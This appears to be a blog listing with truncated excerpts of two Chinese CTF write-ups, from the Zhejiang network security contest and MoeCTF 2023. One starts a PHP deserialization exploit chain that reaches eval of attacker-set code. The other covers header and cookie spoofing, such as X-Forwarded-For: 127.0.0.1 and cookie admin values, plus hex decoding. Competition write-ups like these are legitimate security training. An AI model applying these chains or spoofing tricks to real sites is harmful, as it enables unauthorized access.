第六届浙江省网络与信息安全竞赛 初赛 部分wp
前言初赛名次14,太爽了,被带飞了属于是,web都是做到最后几步出不来丢给大爹🤣🤣🤣 解题情况 解题过程Web1.ezphpPHP反序列化,var_dump触发BBB,通过BBB中的param1触发CCC,通过CCC中的$this->func->aaa()触发AAA执行任意代码 exp如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phphighlight_file(___FILE___); class AAA{ public $cmd; public function __call($name, $arguments){ eval($this->cmd); return "done"; } }class BBB{ public $param1; public function...
MoeCTF 2023 部分write up
签到题hello CTFer给了个url,直接打开就有flag 然后提交就完了 WEBhttp下载一个叫WSRX的客户端连接一下开环境以后给的地址 然后访问localhost:64824 然后就是完成这些任务,1、2有手就行 5就是将ua头的值换成MoeBrowser就行 3是将cookie中的character的值改为admin就行 4是在数据包添加一个字段 1X-Forwarded-For: 127.0.0.1 然后所有任务完成,flag就出了 web入门指北题目显示要解码得flag 先把附件下载下来看看,解压完是个pdf文档 文档最后发现了一组神秘数字,要解码的应该就是这个了 一眼十六进制,那就转字符一下,写个脚本 1234567891011original_hex_string = "66 6c 61 67 3d 62 57 39 6c 59 33 52 6d 65 33 63 7a 62 45 4e 76 62 57 56 66 56 47 39 66 62 57 39 6c 51 31 52 47 58 31 63 79 59 6c...